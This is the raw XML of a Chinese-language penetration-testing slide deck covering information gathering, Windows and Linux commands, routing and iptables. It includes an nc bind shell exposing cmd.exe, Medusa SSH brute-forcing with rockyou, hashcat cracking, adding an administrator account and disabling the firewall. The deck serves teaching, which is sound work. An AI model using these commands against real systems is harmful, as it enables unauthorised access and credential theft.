            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>，需要多个账号进行尝试，那么也要将账号整理成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>txt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Medusa -H ip.txt -U acount.txt -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/passwords/wordlists/rockyou.txt -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>规律是如果是单个目标，则参数都是小写的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>h,u,p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>，如果需要多个目标加载，则都是大写的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>H,U,P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>参数后加需要破解的模块。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5036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Windows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基础命令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56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84962" y="1458502"/>
            <a:ext cx="840105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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Users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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Administrators  net localgroup administrators </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ceshi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/add</a:t>
            </a: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Net user ceshi pass /add</a:t>
            </a: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Systeminfo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看系统信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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query user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在线用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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logoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>剔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>除用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-an | find “3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>″ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看在线端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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Sc query </a:t>
            </a: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Sc qc services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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>oute print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看路由表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>et start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看开机启动服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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netsh firewall show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防火墙配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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netsh firewall show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>state </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防火墙状态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netsh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>firewall set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>opmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> disable  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>关闭防火墙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hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -m 400 -a 0 hash /root/rockyou.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>破解密码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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 31337 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -e cmd.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>攻击机 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nv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target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 31337</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141800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LINUX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网络</a:t>
            </a:r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/>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b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lt"/>
              </a:rPr>
              <a:t>SECTION HEADER HERE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea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97450" y="3173037"/>
            <a:ext cx="6523037" cy="2970587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渗透测试最重要的阶段之一就是信息收集。为了启动渗透测试，用户需要收集关于目标主机的基本信息。用户得到的信息越多，渗透测试成功的概率也就越高。枚举服务；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测试网络范围；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识别活跃的主机和查看打开的端口；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系统指纹识别；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服务指纹识别；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其他信息收集手段；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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>收集信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>绘制网络图。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40071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Linux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路由基础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56987" y="128707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1.Ipip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>建立 路由转发 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>snat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>创建</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A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56" y="1810295"/>
            <a:ext cx="5184201" cy="12134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25756" y="3239177"/>
            <a:ext cx="8402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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>B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756" y="3711538"/>
            <a:ext cx="5060119" cy="11705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68535" y="5103835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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2.Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网络配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vmware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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网卡使用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007" y="5046655"/>
            <a:ext cx="4432176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路由和防火墙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59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6326" y="1028700"/>
            <a:ext cx="10095722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路由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echo 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip_forwad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路由转发开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>关闭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route add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/24 via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>下一跳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网卡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route del 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routn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –n  or 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route show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en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>snat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>创建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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -A PREROUTING -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –destination-port 80 -j REDIRECT –to-port 10000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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -A POSTROUTING -s 172.20.10.0/24 -d 10.0.0.0/8 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ethpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -j MASQUERADE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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nvL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --line-number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>表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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -D POSTROUTING 1 ##</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>删除第一条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-A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 21 -j ACCEPT  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>开放端口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-I INPUT -s 123.45.6.7 -j DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网段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-L –n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-A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
